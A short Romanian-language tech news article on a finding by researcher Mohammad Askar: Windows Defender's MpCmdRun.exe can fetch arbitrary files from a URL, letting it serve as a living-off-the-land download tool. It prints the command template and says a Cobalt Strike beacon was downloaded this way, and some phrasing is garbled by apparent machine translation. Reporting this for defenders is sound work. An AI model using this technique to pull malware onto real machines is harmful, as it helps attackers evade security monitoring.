Friendoffriends
Windows Defender în Windows 10 este prima linie de apărare în caz de atacuri malware și face și o treabă destul de bună.
Cu toate acestea, într-una dintre noile sale actualizări, puternicul antivirus a primit o nouă comandă DownloadFile, care va permite oricui să descarce orice fișier dintr-un URL pe o anumită cale de pe computerul dvs..
Putem numi acest lucru un exploit, deoarece ar putea fi folosit și pentru a descărca chiar malware, lucru descoperit de cercetătorul în securitate Mohammad Askar, care și-a postat descoperirea pe Twitter.
Cum poate fi utilizat Windows Defender pentru a descărca programe malware?
Este foarte simplu să utilizați utilitarul Microsoft Antimalware Service Line Line (MpCmdRun.exe) pentru a descărca orice fișier dintr-o sursă externă pe computerul dvs..
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
În încercarea sa, Askar a reușit să descarce baliza Cobalt Strike, un cunoscut instrument de atacare care utilizează această linie de comandă.
Noua comandă este inclusă în versiunea 4.18.2007.8-0 și mai sus, ceea ce oferă un timp de început destul de bun pentru atacatori.
Practic, această caracteristică transformă Windows Defender într-un LOLBIN (care trăiește din linii binare), un fișier de sistem inofensiv care poate fi utilizat în scopuri rău intenționate.
Din fericire, după ce descărcați fișierul dăunător, acesta va fi detectat de același Windows Defender sau de un alt software antivirus dacă este prezent.
Dintr-un software de protecție fiabil, Windows Defender s-a transformat într-o altă posibilă amenințare care va trebui monitorizată îndeaproape de administratori și experți în securitate.
Dacă aveți sugestii sau comentarii, vă rugăm să le lăsați mai jos în secțiunea Comentarii.
